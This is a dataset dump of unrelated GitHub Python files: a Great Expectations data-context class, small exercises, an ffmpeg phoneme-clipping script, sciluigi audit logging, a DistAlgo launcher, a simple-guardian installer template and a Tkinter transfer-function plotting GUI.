EphemeralDataContextVariables(\n config=self._project_config,\n )\n return variables\n\n def _init_datasource_store(self) -> None:\n from great_expectations.data_context.store.datasource_store import (\n DatasourceStore,\n )\n\n store_name: str = \"datasource_store\" # Never explicitly referenced but adheres\n # to the convention set by other internal Stores\n store_backend: dict = {\"class_name\": \"InMemoryStoreBackend\"}\n\n datasource_store: DatasourceStore = DatasourceStore(\n store_name=store_name,\n store_backend=store_backend,\n )\n self._datasource_store = datasource_store\n\n def _save_project_config(self) -> None:\n \"\"\"Since EphemeralDataContext does not have config as a file, display logging message instead\"\"\"\n logger.debug(\n \"EphemeralDataContext has been detected - skipping DataContext._save_project_config\"\n )\n return None\n\n def save_expectation_suite(\n self,\n expectation_suite: ExpectationSuite,\n expectation_suite_name: Optional[str] = None,\n overwrite_existing: bool = True,\n **kwargs: Dict[str, Any],\n ):\n \"\"\"Save the provided expectation suite into the DataContext.\n\n Args:\n expectation_suite: the suite to save\n expectation_suite_name: the name of this expectation suite. If no name is provided the name will \\\n be read from the suite\n\n overwrite_existing: bool setting whether to overwrite existing ExpectationSuite\n\n Returns:\n None\n \"\"\"\n if expectation_suite_name is None:\n key: ExpectationSuiteIdentifier = ExpectationSuiteIdentifier(\n expectation_suite_name=expectation_suite.expectation_suite_name\n )\n else:\n expectation_suite.expectation_suite_name = expectation_suite_name\n key: ExpectationSuiteIdentifier = ExpectationSuiteIdentifier(\n expectation_suite_name=expectation_suite_name\n )\n if self.expectations_store.has_key(key) and not overwrite_existing:\n raise ge_exceptions.DataContextError(\n \"expectation_suite with name {} already exists. 
If you would like to overwrite this \"\n \"expectation_suite, set overwrite_existing=True.\".format(\n expectation_suite_name\n )\n )\n self._evaluation_parameter_dependencies_compiled = False\n return self.expectations_store.set(key, expectation_suite, **kwargs)\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/data_context/data_context/ephemeral_data_context.py","file_name":"ephemeral_data_context.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"2793073827","text":"import sys\ninput = sys.stdin.readline\n\ndef VPS(chars):\n stack = []\n for char in chars:\n if char == \"(\":\n stack.append(char)\n else:\n if len(stack) >= 1 and stack[-1] == \"(\":\n stack.pop()\n else:\n return \"NO\"\n if len(stack)==0:\n return \"YES\"\n else:\n return \"NO\"\n\nN = int(input())\nfor _ in range(N):\n chars = str(input().rstrip())\n print(VPS(chars))","repo_name":"silverjjj/algorithm","sub_path":"BOJ/9012.py","file_name":"9012.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21479288090","text":"import os\nimport sys\nimport subprocess\nimport json\nimport math\nimport statistics\n\n# Converts seconds to timestamp string\ndef seconds_to_ffmpeg_format(seconds):\n result = str(math.floor(seconds/3600))+\":\"+str(math.floor(seconds/60)%60)+\":\"+str(seconds%60)\n return result\n\n\ndef create_ffmpeg_command(folder_name, word, phone_index):\n command = \"ffmpeg -i \"\n command = command + folder_name \n phone_offset = word['start']\n for j in range(phone_index):\n phone_offset += word['phones'][j]['duration']\n # Continue assembly of command\n # Beginning\n command = command + \".mp3 -vn -acodec mp3 -ss \" + seconds_to_ffmpeg_format(phone_offset)\n command = command + \" -t \" + seconds_to_ffmpeg_format(word['phones'][i]['duration'])\n\n file_name = folder_name + \"/\" + word['phones'][phone_index]['phone'][:-2] + \"/\"\n\n try:\n os.mkdir(file_name)\n except FileExistsError:\n pass\n #create incrementing numerical names\n name_found = False\n numerical_extension = 0;\n while not name_found:\n if not os.path.isfile(file_name + str(numerical_extension) + '.mp3'):\n file_name += str(numerical_extension) + '.mp3 -loglevel warning -y'\n name_found = True\n numerical_extension += 1\n\n # Adding name of the phoneme extract\n command = command + \" \" + file_name\n print(command)\n return command\n\n\n# Get the name of the gentle output file from CLI\njsonfile = sys.argv[1]\n\nif not os.path.exists(jsonfile):\n print(\"file \" + jsonfile + \" doesn't exist! 
aborting...\", file=sys.stderr)\n sys.exit()\n\nfolder = str(sys.argv[2]) if len(sys.argv) > 2 else \"\"\nif not folder.strip():\n folder = str(os.path.splitext(jsonfile)[0])\nprint(\"writing to folder \" + folder)\n\nwith open(jsonfile) as json_file:\n data = json.load(json_file)\n\ntry:\n os.mkdir(folder)\nexcept FileExistsError:\n #the folder already existsif not jsonfile.endswith(\"json\"):\n pass\n\n\n#decide which phoneme to use\n# Loop through each word of the transcript\nphoneme_map = {}\nfor word in data['words']:\n # Word has to be in the audio file\n if word['case'] != \"not-found-in-audio\":\n # Iterates phonemes\n for i in range(len(word[\"phones\"])):\n if word['phones'][i]['phone'] in phoneme_map:\n phoneme_map[word['phones'][i]['phone']].append(word['phones'][i]['duration'])\n else:\n phoneme_map[word['phones'][i]['phone']] = [word['phones'][i]['duration']]\n\n #iterates over the phonomes, and replaces the list of all durations with the average duration \nfor phonome in phoneme_map:\n sum_of_all_durations = 0\n for value in phoneme_map[phonome]:\n sum_of_all_durations += float(value)\n average = sum_of_all_durations / len(phoneme_map[phonome])\n print(phoneme_map[phonome])\n try:\n standart_deviation = statistics.stdev(phoneme_map[phonome])\n except statistics.StatisticsError:\n standart_deviation = 0.1\n phoneme_map[phonome] = [average, standart_deviation]\n\n\n# Loop through each word of the transcript\nfor word in data['words']:\n # Word has to be in the audio file\n if word['case'] != \"not-found-in-audio\":\n # Iterates phonemes\n for i in range(len(word[\"phones\"])):\n # Check whether phoneme already exists as saved file\n # assemble ffmpeg command and execute it\n if word['phones'][i]['duration'] >= phoneme_map[word['phones'][i]['phone']][0] - phoneme_map[word['phones'][i]['phone']][1] and\\\n word['phones'][i]['duration'] <= phoneme_map[word['phones'][i]['phone']][0] + phoneme_map[word['phones'][i]['phone']][1]:\n os.system(create_ffmpeg_command(jsonfile.replace(\".json\",\"\"), word, i))\n \n # Progress/status\n print(\"currently at \" + seconds_to_ffmpeg_format(word['start']) + \" from \" + seconds_to_ffmpeg_format(data['words'][-1]['end']))\n","repo_name":"Jugendhackt/synthi-tts","sub_path":"json-times-voice-to-samples.py","file_name":"json-times-voice-to-samples.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"19528836198","text":"\ndef menu():\n print(\"\\nMenu\\n 1 - Soma de 2 números.\\n 2 - Diferença entre 2 números (maior pelo menor).\")\n print(\" 3 - Produto entre 2 números.\\n 4 - Divisão entre 2 números (o denominador não pode ser zero) .\\n\")\n numero = int(input(\"Escolha uma opção:\"))\n\n return numero\n\n\ndef opcao(n, num1, num2):\n if n == 1:\n resultado = num1 + num2\n print(f\"A soma entre os dois números é {resultado}\")\n elif n == 2:\n if num1 > num2:\n resultado = num1 - num2 \n elif num1 < num2:\n resultado = num2 - num1\n else:\n resultado = 0\n print(f\"A diferença entre os dois números é {resultado}\")\n elif n == 3:\n resultado = num1 * num2\n print(f\"O produto entre os dois número é {resultado}\") \n elif n == 4:\n if num2 != 0:\n resultado = float(num1) / float (num2)\n print(f\"A divisão entre os dois números é {resultado}\")\n else:\n print(\"Erro: o denominador não pode ser zero!\")\n else:\n print(\"Opção Inválida!\") \n\n\nvalor1 = int(input(\"Digite o primeiro número:\"))\nvalor2 = int(input(\"Digite o segundo 
número:\"))\nopcao(menu(), valor1, valor2)\n","repo_name":"JhonatanBS/Curso-Python","sub_path":"Estrutura_Condicional/Condicional_01.py","file_name":"Condicional_01.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72897300307","text":"'''\nThis module contains functionality for the audit-trail logging functionality\n'''\n\nimport logging\nimport luigi\nimport os\nimport random\nimport time\n\n# ==============================================================================\n\nlog = logging.getLogger('sciluigi-interface')\n\n# ==============================================================================\n\nclass AuditTrailHelpers(object):\n '''\n Mixin for luigi.Task:s, with functionality for writing audit logs of running tasks\n '''\n def add_auditinfo(self, infotype, infoval):\n '''\n Alias to _add_auditinfo(), that can be overridden.\n '''\n return self._add_auditinfo(self.instance_name, infotype, infoval)\n\n def _add_auditinfo(self, instance_name, infotype, infoval):\n '''\n Save audit information in a designated file, specific for this task.\n '''\n dirpath = self.workflow_task.get_auditdirpath()\n if not os.path.isdir(dirpath):\n time.sleep(random.random())\n if not os.path.isdir(dirpath):\n os.makedirs(dirpath)\n\n auditfile = os.path.join(dirpath, instance_name)\n if not os.path.exists(auditfile):\n with open(auditfile, 'w') as afile:\n afile.write('[%s]\\n' % self.instance_name)\n with open(auditfile, 'a') as afile:\n afile.write('%s: %s\\n' % (infotype, infoval))\n\n def get_instance_name(self):\n '''\n Return the luigi instance_name\n '''\n instance_name = None\n if self.instance_name is not None:\n instance_name = self.instance_name\n else:\n instance_name = self.task_id\n return instance_name\n\n @luigi.Task.event_handler(luigi.Event.START)\n def save_start_time(self):\n '''\n Log start of execution of task.\n '''\n if hasattr(self, 'workflow_task') and self.workflow_task is not None:\n msg = 'Task {task} started'.format(\n task=self.get_instance_name())\n log.info(msg)\n\n @luigi.Task.event_handler(luigi.Event.PROCESSING_TIME)\n def save_end_time(self, task_exectime_sec):\n '''\n Log end of execution of task, with execution time.\n '''\n if hasattr(self, 'workflow_task') and self.workflow_task is not None:\n msg = 'Task {task} finished after {proctime:.3f}s'.format(\n task=self.get_instance_name(),\n proctime=task_exectime_sec)\n log.info(msg)\n self.add_auditinfo('task_exectime_sec', '%.3f' % task_exectime_sec)\n for paramname, paramval in self.param_kwargs.items():\n if paramname not in ['workflow_task']:\n self.add_auditinfo(paramname, paramval)\n","repo_name":"pharmbio/sciluigi","sub_path":"sciluigi/audit.py","file_name":"audit.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"48"} +{"seq_id":"7078760309","text":"\"\"\"Wrapper for launching DistAlgo programs.\n\nThis module provides a launch() function that invokes the interpreter\non this module in a subprocess. 
The __main__ routine in turn calls\nthe DistAlgo entry point.\n\"\"\"\n\n\nimport os\nimport json\nimport subprocess\nimport re\nimport configparser\nfrom os.path import join\nfrom types import SimpleNamespace\n\n\nclass DistAlgoError(subprocess.CalledProcessError):\n \n def __str__(self):\n return ('Command {} returned non-zero exit status {}\\n'\n 'stderr output:\\n{}'.format(\n self.cmd, self.returncode, self.output))\n\n\ndef get_config():\n \"\"\"Read config.txt to determine appropriate environment variables\n and paths.\n \"\"\"\n config = configparser.ConfigParser()\n dirname = os.path.dirname(__file__)\n config.read(join(dirname, '../config.txt'))\n pyconf = config['python']\n \n ns = SimpleNamespace()\n \n ns.python34 = pyconf['python34']\n ns.incoq_root = pyconf['INCOQ_ROOT']\n ns.distalgo_path = pyconf['DISTALGO_PATH']\n \n da_exp_dir = os.path.join(ns.incoq_root, 'experiments/distalgo')\n ns.pythonpath = (ns.incoq_root + ';' + ns.distalgo_path + ';' +\n da_exp_dir)\n \n return ns\n\n\ndef parse_output(s):\n \"\"\"Parse a string of standard output text for the \"OUTPUT: \"\n line and return the parsed JSON object.\n \"\"\"\n m = re.search(r'^OUTPUT: (.*)', s, re.MULTILINE)\n if m is None:\n return None\n return json.loads(m.group(1))\n\n\ndef launch(config, dafile, incfile, daargs):\n \"\"\"Launch the specified DistAlgo program in a subprocess that\n captures/parses standard output and error. Return a JSON object\n obtained by parsing stdout for a line \"OUTPUT: \", where\n is JSON-encoded data.\n \"\"\"\n python = config.python34\n dirname = os.path.dirname(__file__)\n \n env = dict(os.environ.items())\n # Don't let python33's standard library paths override\n # python 34's.\n env['PYTHONPATH'] = config.pythonpath\n \n args = [\n python,\n __file__,\n '-i',\n '-m',\n incfile,\n dafile,\n ]\n args.extend(daargs)\n \n child = subprocess.Popen(\n args, bufsize=-1,\n # To debug, comment out this line to make stdout/stderr\n # the same standard out and error streams as the parent.\n # Alternatively (if the process terminates), uncomment\n # the print statements below.\n # In the future, maybe use something like\n # http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n cwd=dirname,\n env=env,\n universal_newlines=True)\n \n stdout, stderr = child.communicate()\n results = parse_output(stdout)\n# print(stderr)\n# print(stdout)\n \n if child.returncode != 0:\n raise DistAlgoError(child.returncode, args, stderr)\n \n return results\n\n\nif __name__ == '__main__':\n import da\n da.libmain()\n","repo_name":"IncOQ/incoq","sub_path":"experiments/distalgo/distalgo_bridge.py","file_name":"distalgo_bridge.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"43388711323","text":"#!/usr/bin/python3\n\"\"\"posting email address to a certain URL\"\"\"\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n email = sys.argv[2]\n responce = requests.post(url, data={'email': email})\n print(responce.text)\n","repo_name":"Reem-Kamal-Ghoniem/alx-higher_level_programming","sub_path":"0x11-python-network_1/6-post_email.py","file_name":"6-post_email.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38744256854","text":"#!/usr/bin/env python3\n\nfilename = 
\"roms/Diag_F4_1133CMD.BIN\"\nbase_address = 0x9800\n\nfrom diag_common import *\n\nfunctions = [\n (0x0a5, 0x112, \"WriteString\"),\n (0x0bb, 0x102, \"ReadChar\"),\n (0x0c5, 0x110, \"Fn_0c5\"),\n (0x0d0, 0x10a, \"Fn_0d0\"),\n (0x101, 0x104, \"FinishTest\"), # Prints Pass or Fail. checks 0x108 to see if test passed or failed\n (0x133, 0x10e, \"PressSpaceThenExit\"),\n (0x16f, 0x106, \"PrintCtrlCToExit\"), # prints out \"(CONTROL-C TO EXIT)\"\n (0x18b, 0x100, \"Init\"),\n (0x1ee, 0x118, \"Fn_1ee\"), # not called\n (0x291, 0x10c, \"Fn_291\"), # not called\n]\n\nif __name__ == \"__main__\":\n with open(filename, \"rb\") as f:\n bytes = f.read()\n\n memory = b\"\\0\" * (base_address) + bytes + b\"\\0\" * (0x10000 - (len(bytes) + base_address))\n\n #scan_calls(memory, base_address, base_address)\n\n for (addr, indirect_addr, name) in functions:\n memory_addr_info[base_address + addr].label = name\n memory_addr_info[indirect_addr].label = name\n entry_points.append(base_address + addr)\n\n body_addr = parse_header(memory, base_address, base_address)\n\n scan_strings(memory, body_addr)\n\n entry_points.append(0x9ae2)\n entry_points.append(0x9d45)\n entry_points.append(0x9e08)\n entry_points.append(0x9ea7)\n\n disassemble(memory, entry_points)\n","repo_name":"Nakazoto/CenturionComputer","sub_path":"!Other Gits/Phire - centurion_isa-main/disassemble_f4.py","file_name":"disassemble_f4.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"48"} +{"seq_id":"4328840562","text":"# Write your solution here\ndef squared(name, num):\n st = name * num * num\n i = 0\n j = 1\n while j <= num:\n print(st[i:i + num])\n i += num\n j += 1\n\nif __name__ == \"__main__\":\n squared(\"ab\", 3)","repo_name":"emitrofanova/Course-mooc-programming-22","sub_path":"part03-34_word_squared/src/word_squared.py","file_name":"word_squared.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16715653091","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport numpy as np\nimport nltk\nfrom scipy import spatial\nfrom sklearn.metrics.pairwise import cosine_similarity\nsys.path.append(os.path.abspath(\"../embedding\"))\nfrom fasttext_embedding import fastTextEmbedder\n# from elmo_embedding import elmo_embedding\n# from bert_embedding import bert_embedding\n# # bert-serving-start -model_dir \"C:/Users/Hussein/Documents/Research/FYP-Arabic NLP/bert/multilingual_L-12_H-768_A-12\" -num_worker=1\n\nclass embeddingReader:\n def __init__(self, embedder):\n self.embedder = embedder\n\n def concatenateString(self, paragraph, start, length):\n final_string = paragraph[start]\n for i in range(1, length):\n final_string += \" \" + paragraph[start + i]\n return final_string\n\n def get_answer_canditates(self, paragraph):\n para_sents = nltk.sent_tokenize(paragraph)\n candidates = []\n for sent in para_sents:\n para_words = sent.split()\n for i in range(0, len(para_words)):\n for j in range(1, min(15, len(para_words) - i + 1)):\n candidate = self.concatenateString(para_words, i, j)\n candidates.append(candidate)\n return candidates\n\n def read(self, P, Q):\n A = self.get_answer_canditates(P)\n A_embed = []\n for a in A:\n A_embed.append(self.embedder.embed(a))\n Q_embed = self.embedder.embed(Q)\n similarities_raw = cosine_similarity(A_embed, Q_embed.reshape(1, -1))\n similarities = [s[0] for s in similarities_raw]\n indices_sorted = 
np.argsort(similarities)[::-1] # reverse order\n return A[indices_sorted[0]]\n","repo_name":"husseinmozannar/SOQAL","sub_path":"baselines_reading/embedding_match.py","file_name":"embedding_match.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"48"} +{"seq_id":"5762406182","text":"import math\n\nl = 1\nm = 0\nwhile True:\n n = raw_input(\"Please enter a number:\")\n if n.strip() == 'done':\n break\n n = int(n)\n m += n\n fl = float(m)\n print (fl/l)\n l += 1\n","repo_name":"ajschumacher/gadsdc2","sub_path":"06-python/RunningAvg_nolist_KellyO.py","file_name":"RunningAvg_nolist_KellyO.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"33810240024","text":"import sys\nimport os\nimport urllib.request\nimport tempfile\nimport zipfile\nimport shutil\nfrom subprocess import check_call, CalledProcessError\n\nlogin_key = \"{{ login_key }}\"\nzip_url = \"{{ zip_url }}\"\nzip_file = tempfile.mkstemp()[1]\ntarget_directory = \"/usr/share/simple-guardian\"\n\n\ndef run(cmd):\n try:\n check_call(cmd)\n except CalledProcessError:\n print('ERRROR: running command \"%s\" failed for some reason' % cmd)\n except OSError:\n print('ERRROR: running command \"%s\" failed - the command was not found' % cmd)\n\n\n# CHECK REQUIREMENTS\n# - check Python 3 is ued\nif sys.version_info[0] != 3:\n print('you must run this auto installer with Python 3')\n print(\"ERROR: CHECKING REQUIREMENTS FAILED\")\n exit(1)\n# - check root right are available\nif os.geteuid() != 0:\n print('you must give this script root\\'s rights')\n print(\"ERROR: CHECKING REQUIREMENTS FAILED\")\n exit(1)\n# - check that pip and venv are installed\ntry:\n check_call([sys.executable, '-m', 'pip', '-V'])\n check_call([sys.executable, '-m', 'ensurepip'])\nexcept CalledProcessError:\n print('it seems that pip/venv is/are missing. 
I will try to compensate that')\n try:\n check_call(['apt', 'install', '-y', 'python3-pip', 'python3-venv'])\n except CalledProcessError:\n print(\"that didn't make it better, this one is on you\")\n print(\"try to install python3-pip python3-venv on Ubuntu/Debian based systems\")\n print(\"ERROR: CHECKING REQUIREMENTS FAILED\")\n exit(1)\nprint('requirements checked, all OK')\n\nprint('obtaining latest release from %s' % zip_url)\nurllib.request.urlretrieve(zip_url, zip_file)\n\nprint('extracting zip content into temporary folder')\nextracted_dir = tempfile.mkdtemp()\nwith zipfile.ZipFile(zip_file, \"r\") as zip_ref:\n zip_ref.extractall(extracted_dir)\nos.unlink(zip_file)\n\nprint('running simple-guardian\\'s installer')\nrun([sys.executable, '{0}/simple-guardian-master/install.py'.format(extracted_dir)])\n\nprint('removing source files')\nshutil.rmtree(extracted_dir)\n\nprint('logging in with server')\nrun(['simple-guardian-client', 'login', login_key])\n\nprint('removing packed profiles')\nos.unlink(target_directory + \"/data/profiles/default.json\")\n\nprint('restarting service')\nrun(['service', 'simple-guardian', 'restart'])\n\nprint('all done')\n","repo_name":"esoadamo/simple-guardian-server","sub_path":"templates/autoinstall.py","file_name":"autoinstall.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71645211345","text":"from omegaconf import OmegaConf\nimport hydra\nimport hydra.utils\n\ndef hydra_conf_load_from_checkpoint(chkpt_file, cfg):\n instance_args = dict()\n cfg_mask = list()\n for k in cfg.keys():\n if OmegaConf.is_dict(cfg[k]) and '_target_' in cfg[k]:\n instance_args[k] = hydra.utils.instantiate(cfg[k])\n else:\n cfg_mask += [k]\n ModuleType = type(hydra.utils.instantiate(cfg))\n return ModuleType.load_from_checkpoint(\n chkpt_file,\n map_location=lambda storage, loc: storage,\n **OmegaConf.masked_copy(cfg, cfg_mask),\n **instance_args\n )","repo_name":"ivandariojr/LyapunovLearning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"3718807887","text":"from tkinter import*\r\nimport cmath\r\nimport math\r\nimport tkinter.messagebox\r\nroot =Tk()\r\nroot.configure(bg='#eedd82')\r\nrnum= [ ];\r\nrden = [ ];\r\ninum = [ ];\r\niden= [ ];\r\nwr = [0] ;\r\nsc=[];\r\nroot.title(\"wm min/max\")\r\nroot.resizable(0,0)\r\nglobal h\r\nglobal t\r\nglobal p\r\nglobal q\r\nglobal gain\r\nglobal name\r\nglobal Wn\r\nglobal delta\r\nzcount=0;\r\npcount=0;\r\nq=0;\r\nh=0;\r\nt=0;\r\np=0;\r\nglobal k\r\nglobal l\r\nk=0;\r\nl=0;\r\ndef helpmenu() :\r\n sub3 = Toplevel(root)\r\n sub3.title(\"wm min/max\")\r\n sub3.title('HELP')\r\n sub3.resizable(0,0)\r\n\r\n var=\"\"\"\r\nINTRODUCTION \r\n\r\nThe program is a GUI based transfer function analysis package .It takes in\r\nthe values of poles, zeroes and the gain factor of a transfer function.\r\nFrom this it gives the frequency plot, both absolute and bode, and the\r\ntime response which includes step and impulse response. It can also be\r\nused for estimating the stability of the system.\r\nThis software gives the user, better understanding on how the frequency\r\nand time response depends on the poles, zeroes and the gain factor.\r\nIt helps the user to export the project and study it in other softwares. 
\r\n\r\nABOUT THE SOFTWARE\r\n \r\nGraphical User Interface (GUI) is a type of interface that allows users to\r\ninteract with electronic devices through graphical icons and visual indicators.\r\nProgramming in GUI needs a language as a platform. The software adapts Python\r\nto develop a code which gives the desired output.\r\nUsing GUI programming in Python, a package is designed to obtain the\r\nfrequency and time response of a system by computing its transfer function.\r\nPython provides various options for developing graphical user interfaces (GUIs)\r\nout of which one is Tkinter. Tkinter is the standard GUI library for Python.\r\nPython when combined with Tkinter provides a fast and easy way to create\r\nGUI applications.\r\n\r\n\r\n\r\nINPUT FEATURES\r\n\r\n• Magnitude and angle of the poles and zeroes can be located graphically\r\n with the help of an expandable circle and a movable line controlled\r\n using the arrow keys or mouse.\r\n {Left and Right arrow keys for angle variations of 1 degrees\r\n Up and Down keys for magnitude variations by 0.1}\r\n• The assigned poles are marked by ‘x’ mark and zeroes by ‘o’ mark.\r\n• Poles can be entered by using ENTER key or the right click of the mouse.\r\n The zeroes are entered using the SHIFT key or left click of the mouse.\r\n• The user may give the gain factor in the entry box.\r\n• The user can specify the frequency range in which he/she may want to\r\n view the output.\r\n• Click on the Edit button to edit the poles and zeroes after their\r\n entry is done.\r\n\r\n\r\n\r\nMAIN WINDOW COMPONENTS\r\n\r\nA menu bar is provided containing the following:\r\n\r\nFILE:\r\n New project : To create a new project .\r\n Save project : To save the project.\r\n Load project: To import and read from a text file.\r\n Exit: To exit the program.\r\n\r\nFREQUENCY RESPONSE:\r\n Absolute response: |H(jw)| vs w and magmax) :\r\n magmax=abs(mag1)\r\n rem=magmax\r\n f=-1\r\n while(rem>=10) :\r\n rem= rem/ 10\r\n f=f+1;\r\n div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div=int(rem1+1)*pow(10,f-1)\r\n\r\n if(abs(ang1)>angmax) :\r\n angmax=abs(ang1)\r\n rema=angmax\r\n f1=1\r\n if(rema>=45) :\r\n rema= int(rema/ 180)\r\n f1=f1+rema;\r\n if(angmax <45):\r\n rema1 = angmax\r\n f1=(1/4.5)\r\n \r\n d=d+1\r\n d=0\r\n mag1=0\r\n ang1=0\r\n while(d<1000):\r\n num=1;\r\n den=1;\r\n numa=0;\r\n dena=0;\r\n w=pow(10,((d-200)/200))\r\n for g in range (k) :\r\n num= num * cmath.sqrt(pow((w-inum[g]),2) + pow(rnum[g],2));\r\n m=math.degrees(math.atan2((w-inum[g]),rnum[g]))\r\n if(m<0):\r\n m=m+360\r\n numa = numa + m;\r\n for m in range (l) :\r\n den= den* cmath.sqrt(pow((w-iden[m]),2) + pow(rden[m],2));\r\n md=math.degrees(math.atan2((w-iden[m]),rden[m]))\r\n if(md<0):\r\n md=md+360\r\n dena = dena + md;\r\n mag=mag1;\r\n ang=ang1;\r\n mag1=20*math.log10(abs(gain*num/den)); \r\n ang1=(numa - dena);\r\n canvas3.create_line(d+100,(150-(10*mag/div)),d+101,(150-(10*mag1/div)),width=2)\r\n canvas4.create_line(d+100,(150-((25*ang)/(45*f1))),d+101,(150-((25*ang1)/(45*f1))),width=2)\r\n d=d+1;\r\n \r\n for i in range(6):\r\n x= 100 + (i*200)\r\n canvas3.create_line(x,150,x,145,width=2)\r\n canvas3.create_text(x,155,text='%.1f'%(pow(10,(i-1))),anchor=\"ne\")\r\n for j in range(11):\r\n y= 250 - (j*20)\r\n canvas3.create_line(100,y,105,y,width=2)\r\n canvas3.create_text(95,y,text='%.3f'%((-5 +j)* 2*div),anchor=E)\r\n for i in range(6):\r\n x= 100 + (i*200)\r\n canvas4.create_line(x,150,x,145,width=2)\r\n 
canvas4.create_text(x,155,text='%.1f'%(pow(10,(i-1))),anchor=\"ne\")\r\n for j in range(9):\r\n y= 250 - (j*25)\r\n canvas4.create_line(100,y,105,y,width=2)\r\n canvas4.create_text(95,y,text='%.2f'%((-4 +j)*45*f1),anchor=E)\r\n\r\n\r\ndef freqop () :\r\n global canvas1\r\n sub1 = Toplevel(root)\r\n sub1.title(\"wm min/max\")\r\n sub1.resizable(0,0)\r\n sub1.title(\"ABSOLUTE PLOT\")\r\n frame=Frame(sub1)\r\n frame.pack()\r\n bottomframe=Frame(sub1)\r\n bottomframe.pack(side= BOTTOM)\r\n w=0\r\n mag= 1;\r\n ang= 0;\r\n xvar = [ ];\r\n wm = [ ];\r\n Ang = [ ];\r\n numa=0;\r\n dena=0;\r\n global k\r\n global l\r\n sc.append(0);\r\n scrollbar = Scrollbar(frame)\r\n scrollbar.pack( side = BOTTOM, fill=Y )\r\n canvas1 = Canvas(frame,width=600,height=300,bg='#eeeee0',xscrollcommand=scrollbar.set,scrollregion=(0,0,5000,5000))\r\n canvas1.pack()\r\n scrollbar1 = Scrollbar(bottomframe)\r\n scrollbar1.pack( side = BOTTOM, fill=Y )\r\n canvas2 = Canvas(bottomframe,width=600,height=300,bg='#cdcdc1',xscrollcommand=scrollbar.set,scrollregion=(0,0,5000,5000))\r\n canvas2.pack()\r\n scrollbar.config( command = canvas1.xview,orient= HORIZONTAL )\r\n scrollbar1.config( command = canvas2.xview,orient= HORIZONTAL )\r\n canvas1.create_text(20,80,text=\"\\n\".join(\"MAGNITUDE\"), anchor=\"nw\")\r\n canvas1.create_text(300,20,text=\"MAGNITUDE PLOT\")\r\n canvas1.create_text(300,280,text=\"FREQUENCY (in rad/s)\") \r\n canvas2.create_text(20,120,text=\"\\n\".join(\"ANGLE\"), anchor=\"nw\")\r\n canvas2.create_text(300,20,text=\"ANGLE PLOT\")\r\n canvas2.create_text(300,280,text=\"FREQUENCY (in rad/s)\") \r\n \r\n \r\n if(len(sc)==1) :\r\n scale = 0.005\r\n \r\n \r\n else :\r\n sc.remove(0)\r\n scale= 0.005*min(sc)\r\n \r\n UL= scale*500\r\n ful=-1\r\n remul=UL\r\n while(remul>=1) :\r\n remul= remul/ 10\r\n ful=ful+1;\r\n if(UL <1):\r\n rem1ul = UL\r\n ful=0\r\n while(rem1ul<=1):\r\n rem1ul=rem1ul*10;\r\n ful=ful-1;\r\n UL= pow(10,(ful+1))\r\n canvas1.create_line(100,250,100,50,width=2)\r\n canvas1.create_line(100,250,100+(UL/scale),250,width=2)\r\n canvas2.create_line(100,250,100,50,width=2)\r\n canvas2.create_line(100,150,100+(UL/scale),150,width=2)\r\n it=0\r\n \r\n \r\n mag1=0\r\n w=0;\r\n n=0;\r\n magmax=0\r\n ang1=0\r\n angmax=0\r\n while(wmagmax) :\r\n magmax=mag1\r\n rem=magmax\r\n f=-1\r\n while(rem>=10) :\r\n rem= rem/ 10\r\n f=f+1;\r\n div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div= int(rem1+1)*pow(10,f-1)\r\n if(abs(ang1)>angmax) :\r\n angmax=abs(ang1)\r\n rema=angmax\r\n f1=1\r\n if(rema>=45) :\r\n rema= int(rema/ 180)\r\n f1=f1+rema;\r\n if(angmax <45):\r\n rema1 = angmax\r\n f1=(1/4.5)\r\n w=w+scale;\r\n n=n+1;\r\n\r\n mag1=0\r\n ang1=0\r\n w=0;\r\n n=0; \r\n while(w=1) :\r\n remul= remul/ 10\r\n ful=ful+1;\r\n if(UL <1):\r\n rem1ul = UL\r\n ful=0\r\n while(rem1ul<=1):\r\n rem1ul=rem1ul*10;\r\n ful=ful-1;\r\n UL= pow(10,(ful+1))\r\n while(nvmagmax) :\r\n magmax=abs(mag1)\r\n rem=magmax\r\n f=-1\r\n 